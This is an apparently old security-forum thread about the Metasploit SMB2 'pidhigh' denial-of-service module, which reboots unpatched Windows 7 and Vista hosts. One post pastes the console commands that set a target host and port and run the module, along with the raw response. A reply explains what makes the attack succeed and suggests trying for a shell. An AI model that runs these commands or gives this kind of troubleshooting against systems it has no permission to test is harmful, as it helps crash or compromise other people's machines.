Results 1 to 4 of 4

Thread: Metasploit latest video_smb2_negotiate_pidhigh_windows 7(dos) 4 X Security Team

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jun 2007
    Posts
    11

    Default Metasploit latest video_smb2_negotiate_pidhigh_windows 7(dos) 4 X Security Team

    Exploit code for a remote reboot flaw in Microsoft’s implementation of the SMB2 protocol has been posted on the internet, exposing users of Windows 7 and Windows Vista to the teardrop attacks that used to be popular on Windows 3.1 and Windows 95.

    Home Page:

    4xsecurityteam(dot)blogspot(dot)com

    4xunderground(dot)blogspot(dot)com

    vimeo.com/channels/4xsecurityteam

    thak&

  2. #2
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    1

    Default

    hi guys, i have a question, ims testing this auxiliare, but isnt working for me, , my machine doesnt reboot, in the console just show this, and i didnt try in one of my machines, i test it in 3, thats what happens :

    Targeting host 192.168.1.6:445...
    [-] Auxiliary failed: Rex::ConnectionTimeout The connection timed out (192.168.1.6:445).
    Sending request and waiting for a reply...
    msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
    msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.3
    RHOST => 192.168.1.3
    msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
    RPORT => 445
    msf auxiliary(smb2_negotiate_pidhigh) > run[*] Response received: "\x00\x00\x00\x9E\xFESMB@\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00A\x00\x01\x00\x02\x02\x00\x00\x8Dm\x8E\ xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99\x01\x00\x00\x00\ x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x8 B\x06_\xC6\rX\xCA\x01\xFBX+[\xAEW\xCA\x01\x80\x00\x1E\x00 LM `\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA 0\x0E0\f\x06\n+\x06\x01\x04\x01\x827\x02\x02\n"[*] Auxiliary module execution completed

    Does anybody could give me a ideia whats going on??

    Hi guys, i see that theres no thread about this particular question, i tried to execute and run the auxiliare smb2_negotiate_pdhigh in my other 3 computer in my network, but it doesnt excute it, cause myb machiens dont reboot, i have the ports that are suposed to be open to be done, here is the code what it happen:


    Targeting host 192.168.1.6:445...
    [-] Auxiliary failed: Rex::ConnectionTimeout The connection timed out (192.168.1.6:445).
    Sending request and waiting for a reply...
    msf > use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
    msf auxiliary(smb2_negotiate_pidhigh) > set RHOST 192.168.1.3
    RHOST => 192.168.1.3
    msf auxiliary(smb2_negotiate_pidhigh) > set RPORT 445
    RPORT => 445
    msf auxiliary(smb2_negotiate_pidhigh) > run[*] Response received: "\x00\x00\x00\x9E\xFESMB@\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00A\x00\x01\x00\x02\x02\x00\x00\x8Dm\x8E\ xEEc#}B\xA3b\x1D\x03\xB4\xC4%\x99\x01\x00\x00\x00\ x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x8 B\x06_\xC6\rX\xCA\x01\xFBX+[\xAEW\xCA\x01\x80\x00\x1E\x00 LM `\x1C\x06\x06+\x06\x01\x05\x05\x02\xA0\x120\x10\xA 0\x0E0\f\x06\n+\x06\x01\x04\x01\x827\x02\x02\n"[*] Auxiliary module execution completed

    Hope that someone have an ideia that what its going on

  3. #3
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Edit your posts using the Edit button located at the bottom right hand side of said post. Re-read the rules that you agreed to when you signed up.
    This is your one and only warning.

    Furthermore there is no reason to make multiple posts on the same subject.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #4
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    post above yours makes my eyes hurt lol

    Its not enough just to have the port open btw .. you have to be sharing something & it needs to be unpatched.

    If you meet both of those conditions you could either try the other dos, or possibly change the offset.

    Regardless tho why pull a dos when you can pull a shell
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •